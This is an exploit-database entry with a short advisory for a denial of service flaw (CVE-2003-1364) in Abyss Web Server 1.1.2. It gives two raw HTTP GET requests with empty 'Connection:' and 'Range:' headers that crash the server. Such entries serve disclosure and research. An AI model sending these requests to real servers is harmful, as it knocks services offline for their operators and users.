Abyss Web Server 1.1.2 - Incomplete HTTP Request Denial of Service



EKU-ID: 27939 CVE: CVE-2003-1364;OSVDB-2226 OSVDB-ID:
Author: Auriemma Luigi Published: 2003-04-05 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/7287/info

A denial of service vulnerability has been reported for Abyss Web Server. The vulnerability exists when Abyss attempts to parse certain incomplete HTTP headers.

GET / HTTP/1.0
Connection:

GET / HTTP/1.0
Range: